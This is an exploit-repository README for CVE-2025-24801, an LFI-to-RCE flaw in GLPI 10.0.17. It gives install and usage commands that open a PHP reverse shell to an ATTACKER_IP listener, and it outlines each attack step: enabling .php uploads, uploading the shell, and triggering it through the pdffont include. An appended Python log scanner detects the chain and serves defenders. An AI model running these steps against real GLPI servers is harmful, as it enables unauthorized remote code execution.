Source: https://sploitus.com/exploit?id=D62715BF-1F90-5831-A32A-4BDA94983B7E
# CVE-2025-24801 PoC for GLPI RCE
This repository contains a proof-of-concept script (`poc.py`) that exploits CVE-2025-24801, an LFI-to-RCE vulnerability in GLPI 10.0.17. It automates:
* Logging into GLPI
* Enabling `.php` uploads by updating document type settings
* Uploading a PHP reverse shell via the AJAX file upload endpoint
## Installation
```bash
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
```
## Usage
```bash
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
```
* `--url`: Base URL of the GLPI instance (e.g. `https://example.com/glpi`)
* `--user` / `--password`: Valid GLPI technician credentials
* `--lhost` / `--lport`: Attacker IP and port for the reverse shell listener
The script automatically uses `--doc-id 1` by default to update the first document type.
After execution, the script will:
1. Log in and establish a session
2. Enable `.php` uploads by updating document type ID 1
3. Upload `exploit.php` containing a PHP reverse shell payload
You will then need to manually trigger the LFI by specifying the uploaded filename in the PDF font include (e.g., via the report export feature) to achieve RCE.
## How It Works
1. **Login**: Extracts the CSRF token from `/front/login.php` and posts credentials to authenticate.
2. **Enable PHP Uploads**: Fetches `/front/documenttype.form.php?id=1`, parses the CSRF token, and adds `php` to the allowed extensions.
3. **Upload Shell**: Fetches `/front/ticket.form.php` for a CSRF token, then uses `/ajax/fileupload.php` (with `X-Requested-With: XMLHttpRequest`) to upload a PHP reverse shell.
4. **Trigger RCE**: Manually invoke the PDF font LFI by specifying the uploaded shell filename in the `pdffont` parameter during report export.
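As an added defensive example (not part of this repository's code), the following Python script scans web-server access logs for the three stages the chain above leaves visible: a POST to `/front/documenttype.form.php` (a document type's allowed extensions being edited), a POST to `/ajax/fileupload.php` (the AJAX upload endpoint), and a request carrying a `pdffont` query value that looks like a file name or path rather than a font name. The log lines, client IPs and the report export path `/front/report-export.php` are constructed placeholders, not GLPI's real routes. Only logged query strings are inspected, so if `pdffont` travels in a POST body you need request-body logging or an application-level hook to see it; the actual fix is the vendor patch plus keeping `php` out of every document type's allowed extensions, and this script only tells you whether someone has already walked the chain.

```python
"""Added detection example for the CVE-2025-24801 chain described in the README.
Everything below (log lines, IPs, the export path) is constructed sample data."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate PDF font setting is a bare font name. Anything with a dot,
# slash, backslash or encoded byte is treated as a file name or path being
# handed to the font include (assumption: GLPI font names are plain tokens).
SAFE_FONT_RE = re.compile(r'^[A-Za-z0-9_-]{1,64}$')

CHAIN = {"doctype_modified", "file_upload", "pdffont_include"}


def parse_line(line):
    """Parse one combined-format access log line; None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_font_value(value):
    """True when a pdffont value does not look like a plain font name."""
    return SAFE_FONT_RE.match(unquote(value)) is None


def classify(rec):
    """Return the set of chain stages a single request matches."""
    stages = set()
    parts = urlsplit(rec["target"])
    query = parse_qs(parts.query, keep_blank_values=True)
    if rec["method"] == "POST" and parts.path.endswith("/front/documenttype.form.php"):
        stages.add("doctype_modified")   # allowed extensions may have been changed
    if rec["method"] == "POST" and parts.path.endswith("/ajax/fileupload.php"):
        stages.add("file_upload")        # upload endpoint used by the PoC
    for value in query.get("pdffont", []):
        if suspicious_font_value(value):
            stages.add("pdffont_include")  # file name/path passed to the PDF font include
    return stages


def scan(lines):
    """Aggregate matched stages per client IP; IPs with no hits are dropped."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec:
            seen[rec["ip"]] |= classify(rec)
    return {ip: stages for ip, stages in seen.items() if stages}


def full_chain(seen):
    """IPs that touched all three stages, i.e. the complete LFI-to-RCE path."""
    return sorted(ip for ip, stages in seen.items() if CHAIN <= stages)


# Constructed sample log: one client walks the whole chain, another only uploads.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2025:10:01:02 +0000] "POST /glpi/front/login.php HTTP/1.1" 302 512
203.0.113.5 - - [10/Mar/2025:10:01:05 +0000] "GET /glpi/front/documenttype.form.php?id=1 HTTP/1.1" 200 8123
203.0.113.5 - - [10/Mar/2025:10:01:07 +0000] "POST /glpi/front/documenttype.form.php HTTP/1.1" 302 0
203.0.113.5 - - [10/Mar/2025:10:01:12 +0000] "POST /glpi/ajax/fileupload.php HTTP/1.1" 200 211
203.0.113.5 - - [10/Mar/2025:10:01:20 +0000] "GET /glpi/front/report-export.php?pdffont=exploit.php HTTP/1.1" 200 0
198.51.100.9 - - [10/Mar/2025:10:02:00 +0000] "GET /glpi/front/report-export.php?pdffont=helvetica HTTP/1.1" 200 4096
198.51.100.9 - - [10/Mar/2025:10:02:30 +0000] "POST /glpi/ajax/fileupload.php HTTP/1.1" 200 180
""".splitlines()


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip, stages in hits.items():
        print(ip, sorted(stages))
    print("full chain:", full_chain(hits))
```

A lone `file_upload` hit is normal GLPI usage (attachments go through the same endpoint), so alert on `doctype_modified` on its own, on `pdffont_include` on its own, and on any IP that reaches the full chain.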
## Disclaimer
This tool is intended for authorized security testing and educational purposes only. Do not use it against systems without explicit permission.
---
*Created for educational and authorized pentesting purposes.*